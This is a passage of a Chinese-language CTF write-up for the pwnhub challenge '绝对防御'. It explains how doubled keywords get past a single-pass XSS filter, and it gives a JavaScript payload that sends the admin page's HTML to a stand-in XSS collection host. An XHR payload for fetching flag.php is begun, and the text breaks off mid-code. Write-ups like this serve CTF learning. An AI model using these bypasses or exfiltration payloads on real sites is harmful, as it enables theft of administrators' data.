PDF《title: pwnhub绝对防御》

title: pwnhub绝对防御 绝对防御 date: 2017-04-22 17:26:59 tags: [writeup,pwnhub] 听说非预期挺多的,问了下没想到还是半正解 首先打开之后是一个留言板的功能,根据题目的描述,估计就是要先打admin的源码了.

首先大致测试下,发现一些关键点或者标签都被过滤了,如script,img,svg,link,on ... 但是会发现只是被过滤了一次,双写就可以绕过 scrscriptipt,imimgg,svsvgg,lilinknk,oonn ... 符号也都没有被过滤 csp也是script-src 'self' 'unsafe-inline' 'unsafe-eval';

可以直接执行站内的script脚本 那么可以直接构造来打管理员页面的源码 locatioonn.href='http://yourxssplat/?html='+encodeURICompoonnent(document.getElementsByTagName('html')[0].innerHTML) 在里面发现了 Wow, good guys,maybe you want /adminshigesha233e3333#admin 先手动访问下/adminshigesha233e3333,返回 Hello, maybe something in flag.php 那再请求flag.php,返回 hello, hacker, only admin can see it 思路暂时有了,就是要通过管理员查看flag.php页面再将获取的页面源码打回自己的xss平台就ok 那么直接通过留言板里xhr打admin试一下(一开始bot有点毒,其他账号能打,admin返回不了,多提交几次就好了) var xhr=new XMLHttpRequest();

xhr.oonnreadystatechange=functioonn () { if(xhr.readyState==4){ if((xhr.status>=200&&xhr.status